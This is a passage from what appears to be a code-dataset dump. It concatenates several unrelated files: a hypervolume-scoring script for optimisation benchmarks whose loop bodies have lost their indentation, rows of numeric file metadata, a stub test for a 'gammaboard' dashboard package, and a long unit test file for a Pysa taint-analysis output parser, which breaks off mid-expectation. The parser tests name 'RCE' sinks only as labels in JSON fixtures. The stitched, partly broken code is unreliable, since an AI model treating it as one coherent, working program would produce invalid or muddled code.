print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'TNK'
ref = np.array([3,3])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'OSY'
ref = np.array([0,386])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = -1*data[1:,-9:-3] #>0
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'CTP1'
ref = np.array([1,2])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = -1*data[1:,-5:-3] #>0
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'CSI'
ref = np.array([42,4.5,13])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-14:-4]
objectives = data[1:,-4:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
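# The per-problem blocks above all repeat the same pattern; a hedged refactoring sketch,
# kept separate so the original script is untouched. The constraint/objective column slices
# still have to be supplied per problem, and a few problems above (e.g. 'optimize ship',
# 'OSY', 'CTP1') additionally flip constraint signs, which would need to be applied first.
def summarize_hypervolume(fname, ref, constraint_slice, objective_slice):
    """Compute feasible-only hypervolume statistics over every run file in a folder."""
    hyp = []
    for file in os.listdir(fname):
        data = np.genfromtxt(fname + '/' + file, delimiter=',')
        constraints = data[1:, constraint_slice]
        objectives = data[1:, objective_slice]
        feasible = np.sum(constraints <= 0, axis=1) == constraints.shape[1]
        hyp.append(hypervolume(objectives[feasible], ref))
    return np.mean(hyp), np.max(hyp), np.std(hyp)

# Example, mirroring the 'SRD' block above:
# print(summarize_hypervolume('SRD', np.array([7000, 1700]), np.s_[10:-3], np.s_[-3:-1]))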
| 30.746667
| 69
| 0.631685
| 1,011
| 6,918
| 4.322453
| 0.104847
| 0.102975
| 0.12357
| 0.102975
| 0.844622
| 0.833181
| 0.833181
| 0.833181
| 0.833181
| 0.833181
| 0
| 0.046524
| 0.157994
| 6,918
| 225
| 70
| 30.746667
| 0.703691
| 0.049147
| 0
| 0.764706
| 0
| 0
| 0.014256
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026738
| 0
| 0.026738
| 0.240642
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
787305328e7c39c07f84c3f6b91187470a94df1b
| 187
|
py
|
Python
|
gammaboard/tests/test_gammaboard.py
|
gammaboard/gammaboard
|
9a3bd289b4e8f0c933a08b225febb45966fcddd3
|
[
"MIT"
] | null | null | null |
gammaboard/tests/test_gammaboard.py
|
gammaboard/gammaboard
|
9a3bd289b4e8f0c933a08b225febb45966fcddd3
|
[
"MIT"
] | 13
|
2018-12-12T14:15:36.000Z
|
2019-08-27T15:18:14.000Z
|
gammaboard/tests/test_gammaboard.py
|
gammaboard/gammaboard
|
9a3bd289b4e8f0c933a08b225febb45966fcddd3
|
[
"MIT"
] | 1
|
2019-04-15T12:50:49.000Z
|
2019-04-15T12:50:49.000Z
|
from gammaboard import *
def test_open_dashboard():
"""
TODO: test and close notebook automatically
"""
# process = open_dashboard()
# process.terminate()
pass
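    # A hedged sketch of what the TODO above could look like, assuming open_dashboard()
    # returns a process-like object as the commented-out lines suggest (not verified here):
    # process = open_dashboard()
    # try:
    #     assert process.poll() is None  # hypothetical check: dashboard is still running
    # finally:
    #     process.terminate()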
| 15.583333
| 47
| 0.641711
| 19
| 187
| 6.157895
| 0.789474
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.256684
| 187
| 11
| 48
| 17
| 0.841727
| 0.486631
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
7890f1b31bc412acaade19e74b82f7e962b2c917
| 172,776
|
py
|
Python
|
sapp/pipeline/tests/test_pysa_taint_parser.py
|
facebook/sapp
|
4b85d10a791d8e9c8ae83d1f62fbded24845f053
|
[
"MIT"
] | 74
|
2020-12-18T20:04:30.000Z
|
2022-03-22T22:26:02.000Z
|
sapp/pipeline/tests/test_pysa_taint_parser.py
|
facebook/sapp
|
4b85d10a791d8e9c8ae83d1f62fbded24845f053
|
[
"MIT"
] | 61
|
2020-12-21T21:33:05.000Z
|
2022-01-27T21:22:20.000Z
|
sapp/pipeline/tests/test_pysa_taint_parser.py
|
facebook/sapp
|
4b85d10a791d8e9c8ae83d1f62fbded24845f053
|
[
"MIT"
] | 20
|
2021-04-08T01:28:53.000Z
|
2022-03-22T22:26:05.000Z
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import io
import unittest
from typing import Iterable, Union
from ...analysis_output import AnalysisOutput, Metadata
from .. import (
ParseConditionTuple,
ParseIssueConditionTuple,
ParseIssueTuple,
SourceLocation,
ParseTraceFeature,
)
from ..base_parser import ParseType
from ..pysa_taint_parser import Parser
class TestParser(unittest.TestCase):
def assertParsed(
self,
version: int,
input: str,
expected: Iterable[Union[ParseConditionTuple, ParseIssueTuple]],
) -> None:
input = "".join(input.split("\n")) # Flatten json-line.
input = '{"file_version":%d}\n%s' % (version, input) # Add version header.
parser = Parser()
analysis_output = AnalysisOutput(
directory="/output/directory",
filename_specs=["taint-output.json"],
file_handle=io.StringIO(input),
metadata=Metadata(
analysis_root="/analysis/root",
rules={1: {"name": "TestRule", "description": "Test Rule Description"}},
),
)
def sort_entry(e: Union[ParseConditionTuple, ParseIssueTuple]) -> str:
if isinstance(e, ParseConditionTuple):
return e.caller
else:
return e.callable
self.assertEqual(
sorted(parser.parse(analysis_output), key=sort_entry),
expected,
)
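    # For reference: assertParsed strips the newlines out of `input` and prepends a version
    # header, so e.g. version=2 with input '{"kind": "model", "data": {}}' is handed to the
    # parser as the two JSON lines:
    #   {"file_version":2}
    #   {"kind": "model", "data": {}}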
def testEmptyModelV2(self) -> None:
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {}
}
""",
expected=[],
)
def testEmptyModelV3(self) -> None:
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {}
}
""",
expected=[],
)
def testIssueV2(self) -> None:
# Indirect source to indirect sink.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": [
"foo.source"
],
"port": "result",
"length": 1
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
}
],
"features": [ { "always-via": "source-feature" } ]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": [
"foo.sink"
],
"port": "formal(x)[parameter]",
"length": 2
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
}
],
"features": [ { "always-via": "sink-feature" } ]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
)
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
)
],
initial_sources={("_user_controlled", "UserControlled", 1)},
final_sinks={("_remote_code_execution", "RCE", 2)},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Direct source + indirect source to direct sink + indirect sink.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
}
],
"features": [ { "via": "source-direct" } ]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 120,
"start": 121,
"end": 122
},
"resolves_to": [
"foo.source"
],
"port": "result",
"length": 2
},
"leaves": [
{
"kind": "UserControlled",
"name": "_other_user_controlled"
}
],
"features": [ { "always-via": "source-indirect" } ]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 200,
"start": 201,
"end": 202
},
"tito": [ { "line": 210, "start": 211, "end": 212 } ],
"leaves": [
{
"kind": "RCE",
"name": "_other_remote_code_execution"
}
],
"features": [ { "always-via": "sink-direct" } ]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 220,
"start": 221,
"end": 222
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)",
"length": 5
},
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
}
],
"features": [ { "via": "sink-indirect" } ]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
SourceLocation(
line_no=113, begin_column=115, end_column=115
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=120,
begin_column=122,
end_column=122,
),
leaves=[("UserControlled", 2)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="_other_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(y)",
location=SourceLocation(
line_no=220,
begin_column=222,
end_column=222,
),
leaves=[("RCE", 5)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 0),
("_other_user_controlled", "UserControlled", 2),
},
final_sinks={
("_other_remote_code_execution", "RCE", 0),
("_remote_code_execution", "RCE", 5),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# direct source with multiple leaves to direct sinks with multiple leaves.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"tito": [ { "line": 110, "start": 111, "end": 112 } ],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
},
{
"kind": "UserControlled",
"name": "_other_user_controlled"
}
],
"features": [ { "via": "source-direct" } ]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 200,
"start": 201,
"end": 202
},
"tito": [ { "line": 210, "start": 211, "end": 212 } ],
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
},
{
"kind": "RCE",
"name": "_other_remote_code_execution"
}
],
"features": [ { "always-via": "sink-direct" } ]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="_other_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="_other_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 0),
("_other_user_controlled", "UserControlled", 0),
},
final_sinks={
("_other_remote_code_execution", "RCE", 0),
("_remote_code_execution", "RCE", 0),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source with multiple callees to indirect sinks with multiple callees.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": [
"foo.source",
"foo.other_source"
],
"port": "result",
"length": 1
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
}
],
"features": [ { "always-via": "source-feature" } ]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": [
"foo.sink",
"foo.other_sink"
],
"port": "formal(x)[parameter]",
"length": 2
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
}
],
"features": [ { "always-via": "sink-feature" } ]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.other_source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.other_sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={("_user_controlled", "UserControlled", 1)},
final_sinks={("_remote_code_execution", "RCE", 2)},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source into a return sink.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"tito": [ { "line": 30, "start": 31, "end": 32 } ],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
}
],
"features": [
{ "has": "first-index" },
{ "first-index": "payload" },
{ "always-via": "tito" }
]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"leaves": [ { "kind": "RCE" } ]
}
]
}
],
"features": [
{ "has": "first-index" },
{ "first-index": "payload" },
{ "always-via": "tito" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=30, begin_column=32, end_column=32
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="leaf",
port="sink",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("RCE", 0)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={("_user_controlled", "UserControlled", 0)},
# pyre-fixme[6]: Expected `str` but got `None`
final_sinks={(None, "RCE", 0)},
features=[
"has:first-index",
"first-index:payload",
"always-via:tito",
],
fix_info=None,
)
],
)
def testIssueV3(self) -> None:
# Indirect source to indirect sink.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": [
"foo.source"
],
"port": "result"
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"local_features": [ { "always-via": "source-local" } ],
"kinds": [
{
"kind": "UserControlled",
"length": 1,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "source-feature" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": [
"foo.sink"
],
"port": "formal(x)[parameter]"
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"local_features": [ { "always-via": "sink-local" } ],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "sink-feature" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[ParseTraceFeature("always-via:source-local", [])],
type_interval=None,
annotations=[],
)
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[ParseTraceFeature("always-via:sink-local", [])],
type_interval=None,
annotations=[],
)
],
initial_sources={("_user_controlled", "UserControlled", 1)},
final_sinks={("_remote_code_execution", "RCE", 2)},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Direct source + indirect source to direct sink + indirect sink.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"kinds": [
{
"kind": "UserControlled",
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "via": "source-direct" } ]
}
]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 120,
"start": 121,
"end": 122
},
"resolves_to": [
"foo.source"
],
"port": "result"
},
"kinds": [
{
"kind": "UserControlled",
"length": 2,
"leaves": [ { "name": "_other_user_controlled" } ],
"features": [ { "always-via": "source-indirect" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 200,
"start": 201,
"end": 202
},
"tito": [ { "line": 210, "start": 211, "end": 212 } ],
"kinds": [
{
"kind": "RCE",
"leaves": [ { "name": "_other_remote_code_execution" } ],
"features": [ { "always-via": "sink-direct" } ]
}
]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 220,
"start": 221,
"end": 222
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)"
},
"kinds": [
{
"kind": "RCE",
"length": 5,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "via": "sink-indirect" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
SourceLocation(
line_no=113, begin_column=115, end_column=115
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=120,
begin_column=122,
end_column=122,
),
leaves=[("UserControlled", 2)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="_other_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(y)",
location=SourceLocation(
line_no=220,
begin_column=222,
end_column=222,
),
leaves=[("RCE", 5)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 0),
("_other_user_controlled", "UserControlled", 2),
},
final_sinks={
("_other_remote_code_execution", "RCE", 0),
("_remote_code_execution", "RCE", 5),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# direct source with multiple leaves to direct sinks with multiple leaves.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"tito": [ { "line": 110, "start": 111, "end": 112 } ],
"kinds": [
{
"kind": "UserControlled",
"leaves": [
{ "name": "_user_controlled" },
{ "name": "_other_user_controlled" }
],
"features": [ { "via": "source-direct" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 200,
"start": 201,
"end": 202
},
"tito": [ { "line": 210, "start": 211, "end": 212 } ],
"kinds": [
{
"kind": "RCE",
"leaves": [
{ "name": "_remote_code_execution" },
{ "name": "_other_remote_code_execution" }
],
"features": [ { "always-via": "sink-direct" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="_other_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="_other_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 0),
("_other_user_controlled", "UserControlled", 0),
},
final_sinks={
("_other_remote_code_execution", "RCE", 0),
("_remote_code_execution", "RCE", 0),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source with multiple callees to indirect sinks with multiple callees.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": [
"foo.source",
"foo.other_source"
],
"port": "result"
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"kinds": [
{
"kind": "UserControlled",
"length": 1,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "source-feature" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": [
"foo.sink",
"foo.other_sink"
],
"port": "formal(x)[parameter]"
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "sink-feature" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
